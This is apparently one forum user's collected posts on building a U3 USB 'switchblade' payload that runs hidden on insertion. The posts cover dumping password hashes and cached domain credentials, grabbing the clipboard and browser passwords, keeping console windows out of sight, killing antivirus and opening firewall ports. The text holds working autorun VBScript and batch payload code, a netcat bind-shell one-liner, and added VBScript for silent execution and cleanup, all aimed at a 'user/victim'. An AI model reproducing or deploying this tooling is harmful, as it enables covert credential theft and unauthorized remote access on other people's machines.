Everything posted by beakmyn

  1. Just to give everybody a heads up of what's being tested:
     • OS-specific running of payload
     • checking if user is admin to prevent running code that requires admin privilege
     • copy WPA file to stick
     • configurable log path
     • don't run cachedump if machine isn't a member of a domain
     • better clean-up
     • BIOS info
  2. Yeah, that happens sometimes. It's not a bad thing if they're left there IMHO, as it's easier to use the dump file rather than extract the hash from the html file if you need to use it in JTR or OPH. I have better luck with fgdump, btw. I'm going to variablize as much of the script as possible to make it easier to work with. I have 1.5GB of programs on my drive and it's a pain to have to reflash to test (takes 30-45 min).
  3. VBS will also allow you to add/delete/modify/enable/disable the firewall and firewall rules. Such as:
     • add authorized application
     • add port
     • open a closed port
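The three operations listed in the post, driven through the Windows XP SP2 firewall COM API (HNetCfg.*) from VBScript. This is an added example, not beakmyn's script; the application path and the port number are placeholders, and the call needs administrative rights (without them the COM calls fail).

```vbscript
' Added example: Windows Firewall (XP SP2+) from VBScript via HNetCfg.*
' Authorize an application, open a TCP port, list open ports, then remove both.
' Assumptions: C:\Tools\example.exe and port 443 are placeholders.
Option Explicit

' Constants from the INetFw* type library
Const NET_FW_SCOPE_ALL = 0
Const NET_FW_IP_VERSION_ANY = 2
Const NET_FW_IP_PROTOCOL_TCP = 6

Dim fwMgr, fwProfile
Set fwMgr = CreateObject("HNetCfg.FwMgr")
Set fwProfile = fwMgr.LocalPolicy.CurrentProfile

WScript.Echo "Firewall enabled: " & fwProfile.FirewallEnabled

' Add an authorized application (equivalent to the "Exceptions" tab entry)
Sub AuthorizeApp(strPath, strName)
    Dim fwApp
    Set fwApp = CreateObject("HNetCfg.FwAuthorizedApplication")
    fwApp.ProcessImageFileName = strPath
    fwApp.Name = strName
    fwApp.Scope = NET_FW_SCOPE_ALL
    fwApp.IpVersion = NET_FW_IP_VERSION_ANY
    fwApp.Enabled = True
    fwProfile.AuthorizedApplications.Add fwApp
End Sub

' Open a TCP port globally (Enabled = True opens it; False would only add a disabled entry)
Sub OpenPort(intPort, strName)
    Dim fwPort
    Set fwPort = CreateObject("HNetCfg.FwOpenPort")
    fwPort.Port = intPort
    fwPort.Name = strName
    fwPort.Protocol = NET_FW_IP_PROTOCOL_TCP
    fwPort.Scope = NET_FW_SCOPE_ALL
    fwPort.Enabled = True
    fwProfile.GloballyOpenPorts.Add fwPort
End Sub

' Usage: add both, show what is open, then clean up so the box is left as found
AuthorizeApp "C:\Tools\example.exe", "Example application"
OpenPort 443, "Example port 443"

Dim fwItem
For Each fwItem In fwProfile.GloballyOpenPorts
    WScript.Echo "Open port: " & fwItem.Port & "/" & fwItem.Protocol & " (" & fwItem.Name & ")"
Next

' Remove takes the port+protocol for ports and the image path for applications
fwProfile.GloballyOpenPorts.Remove 443, NET_FW_IP_PROTOCOL_TCP
fwProfile.AuthorizedApplications.Remove "C:\Tools\example.exe"
```

Every add and remove is logged by the firewall itself (and, on a managed box, may be overridden by Group Policy), so a payload that opens a port should remove it again before the drive is pulled.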
  4. For the cachedump I use either fgdump -w, which tells it to skip dumping passwords and dump the cache, or Cachedump. Interestingly, I found that on my test machine (XP Pro) using fgdump worked but using cachedump (Gonzor's bundled version 1.x) would hang, the opposite of what you see happening. However, my payload now uses Cachedump 1.3. Note: versions 1.0, 1.1 and 1.2 of cachedump all reported as 1.0 when queried for version. This was fixed in 1.3. Cachedump is really only valid when a user logs on using a domain account but is not connected to the domain. Since this seems to be a common sticking point I'm looking into implementing a watchdog timer. So, if the program doesn't close within X seconds I'll force it to close. X would be configured via the payload.ini; typically it should be 2-5 seconds.
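The watchdog described in the post, as an added example (not beakmyn's payload code): start the tool with WScript.Shell.Exec, poll its Status, and Terminate it if it has not exited within the configured number of seconds. The tool name and the 3-second timeout are placeholders standing in for values the payload would read from payload.ini; note that Exec shows a console window for console tools, the limitation raised again in post 14.

```vbscript
' Added example: run a console tool under a watchdog and kill it on timeout.
' Assumptions: "cachedump.exe" and the 3-second limit are placeholders.
Option Explicit

' Returns True if the tool exited on its own, False if it was terminated.
' strOutput receives whatever the tool wrote to StdOut.
Function RunWithWatchdog(strCommand, intTimeoutSec, ByRef strOutput)
    Dim objShell, oExec, intWaitedMs
    Set objShell = CreateObject("WScript.Shell")
    Set oExec = objShell.Exec(strCommand)

    ' Status 0 = still running, 1 = finished. Poll in 250 ms steps.
    intWaitedMs = 0
    Do While oExec.Status = 0 And intWaitedMs < intTimeoutSec * 1000
        WScript.Sleep 250
        intWaitedMs = intWaitedMs + 250
    Loop

    If oExec.Status = 0 Then
        ' Still hanging (e.g. cachedump on a box that is not a domain member)
        oExec.Terminate
        strOutput = oExec.StdOut.ReadAll   ' whatever was buffered before the kill
        RunWithWatchdog = False
        Exit Function
    End If

    ' Caveat: the StdOut pipe buffer is small (about 4 KB). A tool that writes
    ' more than that before exiting blocks until it is read, which looks like a
    ' hang; for chatty tools read StdOut inside the loop instead of after it.
    strOutput = oExec.StdOut.ReadAll
    RunWithWatchdog = True
End Function

' Usage
Dim strOut
If RunWithWatchdog("cachedump.exe", 3, strOut) Then
    WScript.Echo strOut
Else
    WScript.Echo "cachedump did not finish within 3 seconds and was terminated"
End If
```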
  5. New version:
     • config entry in ini file for save-to directory
     • c:\safety.txt check
     • new version of cachedump (try it out, see the ini file)
     • removed files for haksaw and VNC
     Put the payload.ini in <flashdrive>:\System\Src. Use Notepad to view/modify payload.ini. http://rapidshare.com/files/76123081/flash...em_SRC.zip.html
  6. payload.ini should be in the flashdrive partition src folder. payload.vbs can not be run without providing the path to the U3 and flash partition (look at how I call it in autorun); I figured it was easy to pass the paths rather than re-run the drive search utility. I'll add an option for output directory into the payload.ini, and I'll add a safety.txt option also. I'd have to see it lock up to know what it was trying to do. What's the last thing in the html? Because I'm bypassing error handling in the vbs it makes it harder to debug. If you wanted I could work with you on manually running it without the "on error resume next" so we could debug it. Hmm, I thought it had the latest Vista-capable launchpad. I'll have to get the latest. I think that is for the haksaw, which isn't implemented/tested yet in my code. I'll remove the files and fix the payload since I have no intention of adding them in. I'm still working on a bullet-proof silent device eject. I'll get an update out early next week.
  7. Not to split hairs, but if you wanted you could put everything into the autorun.vbs script and use the methods of the FileSystemObject to do the same thing. Is it faster? I don't know, but the weakest link is the speed of the flash write, not the script. Recursion is easier, IMHO, in vbs. I'll whip something up next week to show you.
  8. Because the average user doesn't know how to program using NSIS. That's why I used vbs, kinda in between your solution and batch files, but I could compile it. In fact I had to Google NSIS, which looks to be Nullsoft's scriptable installer? How silent can it be made?
  9. How do you figure you didn't have administrative rights? You have valid PWDUMP with the local administrator hash. PWdump only dumps hashes for the local accounts since it's being run locally. That user is managed by a domain controller so it will not have a hash in Pwdump, that's what cachedump is for. If you want domain info you have to run it against a domain controller using a domain admin account, something you're not likely to get.
  10. This version doesn't use SBConfig. It requires that the user be able to open the Payload.ini in Notepad (or other text editor) and manually make edits to the ini file. http://www.frontiernet.net/~beakmyn/output.jpg I found a couple of issues. Since I used the WinAudit html layout as an example I missed a title block and it will say "WinAudit Freeware v2.27 Unicode". Whoops, not sure how that one slipped past. Also, if you're going to use this to run an audit against a Windows XP Home edition machine, be sure to disable cachedump. It doesn't appear to exit gracefully and hangs. This is an issue with cachedump and the fact that an XP Home edition machine can not be part of a Windows domain, so no cache information will exist. I think I'll add some checking to force certain tools not to run if the system is XP Home and possibly if you don't have admin, since the tools will fail anyway. I'll make the fixes and re-post a new file. Oh, to view the file click on the Computername-date-time.html, not the "left" or "right" file.
  11. Did you edit the payload.ini? I've tested this on three brands of U3 drives without issues. Right now it's set up to log everything except winaudit.
  12. I took the liberty of re-writing the switchblade in vbs. It now outputs into HTML format and has a few new options. It also uses a payload.ini file instead of the numerous .dat files. LATEST http://rapidshare.com/files/79403074/switc...e0.3.2.zip.html URL history now HTML links.
  13. nc -l -p443 -d -e cmd.exe -L

      nc is netcat
  14. SOLVED. I'm in the process of re-writing the switchblade to vbs. I'm at the point where firepassword is run. By design it only writes to StdOut (the screen). In a batch file you simply pipe the StdOut to a file:

      <blah blah blah> >> %log%

      Well, in vbs there's always more than one way to do things and I can't get either to do it the way I want. I can call

      Set oExec = objShell.Exec("firepassword.exe")
      Do While Not oExec.StdOut.AtEndOfStream
          strLine = oExec.StdOut.ReadLine
      Loop

      and get the output that way, which is all well and good, but you can NOT hide the cmd window that .Exec calls. Although it's only up for a brief second it's long enough to be noticed. So, the other way one would think would be

      objShell.Run "c:\FirePassword.exe > C:\tmp.log", 0, False

      Only problem is that doesn't work. tmp.log is never created and I don't know why. Any ideas? I'm trying to keep everything contained to one script and I don't really want to call a batch file to call firepassword. Are there any alternatives to firepassword?

      SOLUTION:

      objShell.Run "c:\nircmd execmd c:\FirePassword.exe >" & "C:\tmp.log", 0, False
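Why the plain Run call with ">" fails, and a way to do the redirect without a third-party helper, as an added example (not beakmyn's code): WScript.Shell.Run hands the string to CreateProcess, which knows nothing about ">"; redirection is a cmd.exe feature, so the command has to be wrapped in %COMSPEC% /C and the window hidden with style 0. The tool and log paths are placeholders.

```vbscript
' Added example: capture a console tool's output to a file with no visible window,
' using cmd.exe's own redirection instead of nircmd.
' Assumptions: C:\FirePassword.exe and C:\tmp.log are placeholders.
Option Explicit

' Runs strExe hidden, redirecting stdout and stderr to strLogFile.
' Returns cmd.exe's exit code, which is the tool's exit code.
Function RunHiddenToFile(strExe, strLogFile)
    Dim objShell, strCmd, Q
    Set objShell = CreateObject("WScript.Shell")
    Q = Chr(34)
    ' /S tells cmd to strip exactly the outer pair of quotes and keep the inner
    ' ones, so paths containing spaces survive. Run expands %COMSPEC% itself.
    ' Resulting command line: cmd /S /C ""C:\FirePassword.exe" > "C:\tmp.log" 2>&1"
    strCmd = "%COMSPEC% /S /C " & Q & Q & strExe & Q & " > " & Q & strLogFile & Q & " 2>&1" & Q
    ' 0 = SW_HIDE (no window at all), True = wait until the command finishes
    RunHiddenToFile = objShell.Run(strCmd, 0, True)
End Function

' Usage: run, then pull the captured text back into the script for the HTML report
Dim objFSO, strLog, intRc
strLog = "C:\tmp.log"
intRc = RunHiddenToFile("C:\FirePassword.exe", strLog)
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.FileExists(strLog) Then
    WScript.Echo "exit code " & intRc & vbCrLf & objFSO.OpenTextFile(strLog, 1).ReadAll
    objFSO.DeleteFile strLog   ' don't leave the capture behind on the target
Else
    WScript.Echo "no output captured (exit code " & intRc & ")"
End If
```

Because the wait flag is True, Run returns only after the tool exits; a tool that hangs would hang the script with it, which is the case post 4's watchdog is meant for.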
  15. I'll post once it's finished and tested. Gonzor, I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools, but if it's something I can do using native Windows tools then the AV/OS is none the wiser. @HarshReality The AV is typically killed using AVKill but some antivirus are immune or will countermeasure. Safety.txt is one of a couple of schemes to keep from scanning yourself. I've typically seen it used in the autorun script, not the switchblade script. The 2 ways I know to keep from scanning yourself:
      1. check for presence of file "X"
      2. check computername/user against a list stored in a file on the U3
      Personally I would go with 1, less of a paper trail, lest you lose your switchblade, but it requires access to the machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting the U3 drive.
  16. So, I'm in the process of re-writing the switchblade 'code' into vbs. It's based on GonZor's method so it uses the ###.dat files. This is so that I can output the data into HTML format (very similar to WinAudit html). Now here comes one question/decision. Since vbs is more powerful than a simple batch file I can either
      A. wshell.exec("net user"), which will be very fast and give me a list of users
      B. Use WMI or another technique and get vastly more data: AccountType, Caption, Description, Disabled, Domain, FullName, LocalAccount, Lockout, Name, PasswordChangeable, PasswordExpires, PasswordRequired, SID, SIDType, Status
      After doing some testing it appears that, as expected, wshell.exec is almost instantaneous whereas WMI or another method takes 20 seconds. Which would you prefer? I suppose I could just code both and then the user could just put a 1 or 2 in the dat file and I'll run the appropriate one.
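Option B from the post, as an added example (not beakmyn's code): a WMI query against Win32_UserAccount rendered into an HTML table. The query is restricted with "LocalAccount = True"; without that filter WMI tries to enumerate every account in the domain, which is where a 20-second delay on a domain-joined machine usually comes from. The table layout is an assumption, not the post's WinAudit-style markup.

```vbscript
' Added example: local accounts via WMI, with the fields an audit cares about.
' Assumption: output format is a plain HTML table; adapt to the report's style.
Option Explicit

' Returns an HTML table of local accounts. Flags the built-in Administrator
' by its RID (SID ending in -500) so a renamed admin account still stands out.
Function LocalAccountsHtml()
    Dim objWMI, colAccounts, objAcct, strHtml, strNote
    Set objWMI = GetObject("winmgmts:\\.\root\cimv2")
    ' LocalAccount = True is the important part for speed on a domain member
    Set colAccounts = objWMI.ExecQuery( _
        "SELECT Name, SID, Disabled, Lockout, PasswordRequired, " & _
        "PasswordExpires, PasswordChangeable, Status " & _
        "FROM Win32_UserAccount WHERE LocalAccount = True")

    strHtml = "<table border=""1"">" & vbCrLf & _
              "<tr><th>Name</th><th>SID</th><th>Disabled</th><th>Locked</th>" & _
              "<th>PwdRequired</th><th>PwdExpires</th><th>PwdChangeable</th>" & _
              "<th>Status</th><th>Note</th></tr>" & vbCrLf
    For Each objAcct In colAccounts
        strNote = ""
        If Right(objAcct.SID, 4) = "-500" Then strNote = "built-in Administrator (RID 500)"
        strHtml = strHtml & "<tr>" & _
            "<td>" & objAcct.Name & "</td>" & _
            "<td>" & objAcct.SID & "</td>" & _
            "<td>" & objAcct.Disabled & "</td>" & _
            "<td>" & objAcct.Lockout & "</td>" & _
            "<td>" & objAcct.PasswordRequired & "</td>" & _
            "<td>" & objAcct.PasswordExpires & "</td>" & _
            "<td>" & objAcct.PasswordChangeable & "</td>" & _
            "<td>" & objAcct.Status & "</td>" & _
            "<td>" & strNote & "</td></tr>" & vbCrLf
    Next
    LocalAccountsHtml = strHtml & "</table>"
End Function

' Usage: cscript //nologo thisfile.vbs > users.html
WScript.Echo LocalAccountsHtml()
```

The query runs as the current user and needs no elevation; that is also why it cannot tell you anything about password hashes, which is what pwdump/cachedump are for.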
  17. Seeing as batch files are wonderful things in and of themselves, this is 2007 and I want my eye-candy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why? Because vbs is much more powerful than batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.
  18. Oh I thought you were working on something more complicated. I'm in the process of formatting the output using the WinAudit HTML output style with tables and anchors, etc.
  19. I'd like to see that HTML output. I'm working on that now myself.
  20. http://www.frontiernet.net/~wardriver/U3CUSTOM.zip That's got just the scripts and .dat files needed Items in the FD folder need to go on the flash partition sans the FD folder
  21. I made some updates to your scripts, nice job btw. go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error so I've added code to skip a: and b: and error handling that just keeps chugging if it hits a problem, better than crashing and posting a dialog to the user/victim. I've included only what's different, otherwise I'm over the max characters for a message:

      autorun.vbs

      Set objFSO = CreateObject("Scripting.FileSystemObject")
      Set objShell = CreateObject("Wscript.Shell")
      Set colDrives = objFSO.Drives
      On Error Resume Next
      strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
      strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)
      For Each objDrive in colDrives
          'ignore floppy drives - reserved by BIOS if they don't exist
          If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
              'drv.dat marks the writable flash partition
              If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\drv.dat") Then
                  strfd = objDrive.Driveletter & ":"
              End If
              'go.bat lives on the read-only U3 (cdrom) partition
              If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\go.bat") Then
                  strU3 = objDrive.Driveletter & ":"
              End If
          End If
      Next
      'PL.dat present = run the payload; arguments are flash drive, U3 drive, date, time
      If objFSO.FileExists(strfd & "\System\SRC\PL.dat") Then
          objShell.Run strU3 & "\System\SRC\go.bat " & strfd & "," & strU3 & "," & strDate & "," & strTime, 0, False
      End If
      'U3.dat present = also start the normal U3 launchpad
      If objFSO.FileExists(strfd & "\System\SRC\U3.dat") Then
          objShell.Run ".\LaunchU3.exe -a"
      End If

      go.bat

      I've added nircmd to grab the clipboard contents and winaudit (google it).

      :: Props: Setzer1411, Marc, rpk5000
      :: fd = flash partition (writable)
      :: U3 = cdrom partition (readonly)
      @ECHO off
      If %computername%.==. SET computername=computer
      If %username%.==. SET username=None
      SET fd=%1\System
      SET U3=%2\System\SRC
      CD %U3% >NUL
      :: SET LOG PATHS
      IF NOT EXIST %fd%\Logs\%computername% ( MD %fd%\Logs\%computername% )
      SET logdir=%fd%\Logs\%computername%
      SET log="%fd%\Logs\%computername%\%computername%-[%3-%4].log"
      SET tmplog="%fd%\Logs\%computername%\%computername%_TEMP.log"
      SET include="%fd%\SRC\Include\
      SET /p eipurl=<"%1\System\SRC\Include\EIP.dat"
      SET /p winaud=<"%1\System\SRC\Include\winaud.dat"
      :: PAYLOAD
      ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
      ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
      ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
      ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1
      IF EXIST %include%0.dat" (
          ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
          ECHO +----------------------------------+ >> %log% 2>&1
          ECHO + [System info] + >> %log% 2>&1
          ECHO +----------------------------------+ >> %log% 2>&1
          IPCONFIG /all >> %log% 2>&1
          Echo +-----------------------------------+ >> %log% 2>&1
          Echo + Shares + >> %log% 2>&1
          Echo +-----------------------------------+ >> %log% 2>&1
          net share >> %log% 2>&1
          Echo +-----------------------------------+ >> %log% 2>&1
          Echo + Users + >> %log% 2>&1
          Echo +-----------------------------------+ >> %log% 2>&1
          net user >> %log% 2>&1
      )
      IF EXIST %include%19.dat" (
          ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
          Echo +-----------------------------------+ >> %log% 2>&1
          Echo + Clipboard + >> %log% 2>&1
          Echo +-----------------------------------+ >> %log% 2>&1
          .\nircmd.exe clipboard addfile %log%
      )
      IF EXIST %include%20.dat" (
          ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
          Echo +-----------------------------------+ >> %log% 2>&1
          Echo + Win Audit + >> %log% 2>&1
          Echo +-----------------------------------+ >> %log% 2>&1
          ECHO WinAudit saved to %logdir% >> %log% 2>&1
          .\WinAudit.exe %winaud% /f=%logdir%\WA_%computername%[%3-%4] /f=%logdir%\WA_%computername%[%3-%4].txt >> %log% 2>&1
          ECHO. >> %log% 2>&1
      )
      ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
      ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
      ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
      :End
      EXIT

      winaud.dat (rtfm for winaudit to see what the switches do)

      /r=oxutn /o=PDF /m=CA Security Scan

      Also for the EIP I use http://checkip.dyndns.org/. You could use regular expressions to remove the extra HTML

      <html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html>

      but it gets the job done and uses a public server. Take a look at nircmd if you haven't already; it does a lot of nice things with the registry and such. Could automate things more smoothly. It'll also allow you to beep the speaker at a given frequency and length. 3 quick 2600hz tones at the end of the script could tell you when to pull out. ;)
  22. Found the following issues:
      • | was being used as a piped command where I think your intention was for it to be a pipe character.
      • If you have a multi-card USB hub or other USB holder with no disk, the for loop will cause errors to be displayed to the user about "no disk present" abort, retry, fail.
      • Count script sometimes returns "volume in drive d is removable" (where d is variable). This screws up the file name and you get computername - [volume in drive d is removable].log. I'm investigating root cause.
  23. I'd love to take a look at the tweaks you've made, as well as the executable. What language? It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some cases 3 ", which is what I expected to see in your code. But that tends to muck things up, so instead I'll use chr(34) or equivalent and concatenation. I guess the batch file environment is more forgiving, being an interpreted language, but it makes the syntax highlighting in ExeScript goofy. That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with an exe wrapper. Not a real executable, yet. One thing I've done is changed the layout for the log file:

      ECHO +-----------------------------------+ >> %log% 2>&1
      ECHO | [System info] | >> %log% 2>&1
      ECHO +-----------------------------------+ >> %log% 2>&1

      I find the above easier on the eyes than the old ***** method. I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when it's done. The one thing I do like is that you still have launchpad functionality and the tools are on the CDROM partition rather than flash. I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead.